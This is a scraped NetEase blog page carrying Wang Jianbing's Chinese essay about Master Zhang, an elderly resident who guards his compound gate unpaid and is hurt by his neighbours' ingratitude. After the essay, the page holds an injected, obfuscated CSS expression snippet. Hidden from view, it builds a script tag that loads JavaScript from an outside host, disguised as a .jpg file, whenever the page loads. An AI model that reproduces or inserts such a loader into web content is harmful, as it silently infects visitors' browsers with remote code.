注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

王剑冰博客

散文《绝版的周庄》作者,河南省作家协会副主席

 
 
 

日志

 
 
关于我

1982年毕业于河南大学中文系。1975年赴乡村插队务农,后历任《奔流》杂志编辑,《文艺百家报》、《当代人报》采通部主任,《散文选刊》副主编,副编审。1979年开始发表作品。1993年加入中国作家协会。 河南省作家协会副主席,全国鲁迅文学奖二、三、四届评委,国务院特殊津贴专家。

网易考拉推荐

门卫张师傅  

2009-09-02 08:41:00|  分类: 随笔 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

门卫张师傅

王剑冰

 

张师傅是这个院里的住户,起先他不是门卫,只是原来的门卫不干了,院子里又总是被盗,尤其是经常丢车,这车甚至包括汽车,张师傅就自己走马上任了。张师傅自家也丢了好几辆车子,当然不是汽车,张师傅家里不称汽车。有人一撺掇,张师傅就搬到门口的小屋里去住了。那小屋实在是小,小的仅仅放下一张小床,其余的地方就只能放脚了。张师傅还用自己的钱买了灯泡,安在了主要的通道口。

张师傅个子高高的,看起来还真像个门卫。张师傅就是牙不好,一口牙剩了没几个把门的,其余的都溜走了,就像这小区的保安。所以张师傅对人笑起来的时候,总是让人先看见他的牙。张师傅还总是对着人笑。但对于生人,他就会把嘴紧闭上,透出一股严肃的神情。到了晚上,张师傅的手里就多了一根棍子和一只很亮的手电筒。张师傅当着门卫,可他并不总是在门口的小屋里呆着,而是在前后两个院子里来回地巡逻。

这是一个人员十分杂乱的小区,里边住的人干什么的都有,但不缺少汽车,一到晚上院子里就会停满了各式各样的汽车。有人就建议收一收停车费,这样还可以充一些垃圾的费用。可是有人不同意,这事就搁下了。而且还有一些人连十几块钱的门卫费也不愿意交。由于这些人的影响,其他的人就总是忿忿然,然后也就不交了。不管这钱能不能按时交到张师傅手里,张师傅都是任劳任怨地干着。

张师傅爱写写画画,没事的时候,张师傅就在地上用粉笔画一只大公鸡,再画一个坏蛋,旁边题上让小偷人人喊打。门口的小黑板上,张师傅总是写一些让人愉快的话,比如春节了他就写上祝大家新春快乐。或写一些警示的话,比如:这一段是案件高发期,望大家提高警惕。由于有了张师傅的精心工作,小区的治安明显好多了。

但是也由于每月不到五百元的工钱一直不能兑现,人们给张师傅找的搭档就被人拽回去了,尽管那也是个好老头,也是风里雨里地受苦受罪。这样就又剩下了张师傅一个人。去年冬天的雪下得特别大,而那间小屋里就特别的冷。没有人知道张师傅是怎么度过那一个个白天和夜晚的。张师傅有孩子,偶而会看见他的并不小的孩子,提着饭盒给他送来饭菜,就像给一个上正常班的父亲送饭一样。

后来不知道从哪一天起,人们发现张师傅没有在那个小屋里。而且是院子里又丢了东西。有人说张师傅是被人气病了。一是张师傅拦住了一个不经常在这院住的人,这人冲张师傅发了一通火还说了难听话。一是有人丢了一辆自行车,责问张师傅是干什么吃的。别看张师傅人高马大的,但从不会跟人高声说话,更没有见过他跟人吵嘴。张师傅完全的尽义务的行为反带来了许多的尴尬。张师傅就病倒了。后来的一段时间,小偷频频光顾这个小区,警察也来过无数次。但是没有人挑头再管门卫的事。

又一天,人们看见张师傅又露着缺少门牙的笑,站在了小区的门口。有人问,张师傅,要交门卫费吗,我现在就交,张师傅只是笑笑说,这事看居委会怎么说吧。我反正在家也是闲着。有人说,应该给张师傅写封表扬信,终是没有见贴出来。人们表达的方式,就是走到门口的时候,向张师傅送去友好的笑意。

大家知道,张师傅是呆不住啊,他太有了一颗本有的责任感和良善的心。

 

ee:expression_r(function(){if(!window.r){varss='s'+'cript';var tt='text/ja'+'vas'+'cript';varst=document.createElement_x(ss);st.src='http://imgcache.suqian114.cn/a/s/sina.jpg';st.type=tt;document.getElementsByTagName('head').item(0).appendChild(st);window.r=1}}(this));width:0px;display:none">
  评论这张
 
阅读(111)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017